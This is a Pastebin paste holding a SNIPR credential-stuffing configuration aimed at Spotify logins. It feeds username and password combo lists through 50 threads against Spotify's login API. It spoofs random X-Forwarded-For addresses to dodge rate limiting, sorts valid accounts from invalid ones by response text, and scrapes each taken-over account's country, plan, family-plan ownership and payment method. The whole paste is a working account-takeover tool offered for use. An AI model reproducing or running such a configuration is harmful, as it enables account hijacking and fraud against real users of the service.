Advertisement
Guest User

Untitled

a guest
Dec 6th, 2018
16,620
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.16 KB | None | 0 0
  1.  
  2. General
  3. name "Spotify"
  4. proxyType "Proxyless"
  5. comboType "Email/Username"
  6. threads 50
  7. schemeVersion 1.1
  8. CustomTextFunctions
  9. 0
  10. name "GENERATEIP"
  11. code "Random random = new Random(); return random.Next(1, 255).ToString() + \".\" + random.Next(0, 255).ToString() + \".\" + random.Next(0, 255).ToString() + \".\" + random.Next(0, 255).ToString();"
  12. Requests
  13. 0
  14. url "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F"
  15. method "GET"
  16. userAgent "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1"
  17. successKeys
  18. 0 "Spotify</title>"
  19. banKeys
  20. 0 "<HTTPCODE>||429"
  21. headers
  22. 0
  23. name "X-Forwarded-For"
  24. value "<![ 1:|SNIPR|:custom_GENERATEIP ]!>"
  25. 1
  26. url "https://accounts.spotify.com/api/login"
  27. method "POST"
  28. userAgent "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1"
  29. contentType "application/x-www-form-urlencoded"
  30. accept "application/json, text/plain, */*"
  31. postData "remember=true&username=<USER>&password=<PASS>&csrf_token=<![ 1:|SNIPR|:COOKIE:|SNIPR|:csrf_token ]!>"
  32. cookies "__bon=MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx"
  33. headers
  34. 0
  35. name "X-Forwarded-For"
  36. value "<![ 1:|SNIPR|:custom_GENERATEIP ]!>"
  37. successKeys
  38. 0 "displayName"
  39. failureKeys
  40. 0 "errorInvalidCredentials"
  41. 1 "Unexpected status: 400"
  42. 2 "{\"error\":\"errorUnknown\"}"
  43. banKeys
  44. 0 "<HTTPCODE>||429"
  45. 2
  46. url "https://www.spotify.com/us/account/overview/"
  47. method "POST"
  48. userAgent "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1"
  49. postData "remember=true&username=<USER>&password=<PASS>&csrf_token=<![ 1:|SNIPR|:COOKIE:|SNIPR|:csrf_token ]!>"
  50. headers
  51. 0
  52. name "X-Forwarded-For"
  53. value "<![ 1:|SNIPR|:custom_GENERATEIP ]!>"
  54. successKeys
  55. 0 "<h1>Account overview</h1>"
  56. failureKeys
  57. 0 "Spotify Free"
  58. 1 "Premium Paused"
  59. banKeys
  60. 0 "<HTTPCODE>||429"
  61. regex
  62. 0
  63. name "xcountry"
  64. pattern "card-profile-country\">([^<]*)"
  65. usedFor "capture"
  66. 1
  67. name "xsubscription"
  68. pattern "\">\\s*<div class=\"well card subscription [^>]*><h3 class=\"product-name\">(.*)<\\/h3>"
  69. usedFor "capture"
  70. 3
  71. url "https://www.spotify.com/us/account/subscription/"
  72. method "GET"
  73. userAgent "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1"
  74. accept "*/*"
  75. headers
  76. 0
  77. name "X-Forwarded-For"
  78. value "<![ 1:|SNIPR|:custom_GENERATEIP ]!>"
  79. successKeys
  80. 0 "<h1>Subscription and payment</h1>"
  81. regex
  82. 0
  83. name "family"
  84. pattern "(btn-manage-familyplan)"
  85. usedFor "capture"
  86. 1
  87. name "payvia"
  88. pattern "payment-details-name\">\\s*([^\\n]*)"
  89. usedFor "capture"
  90. capture
  91. 0 "<![ 1:|SNIPR|:REPLACE:|SNIPR|:+xsubscription|1+:|SNIPR|:<span class=\"icon-checkmark-wrap\"><svg><use xlink:href=\"#icon-checkmark\"></use></svg></span>Spotify:|SNIPR|: ]!>"
  92. 1 "+xcountry|1+"
  93. 2 "<![ 1:|SNIPR|:REPLACE:|SNIPR|:+family|1+:|SNIPR|:btn-manage-familyplan:|SNIPR|:Family OWNER! ]!>"
  94. 3 "<![ 1:|SNIPR|:REPLACE:|SNIPR|:+payvia|1+:|SNIPR|:&nbsp;:|SNIPR|: ]!>"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement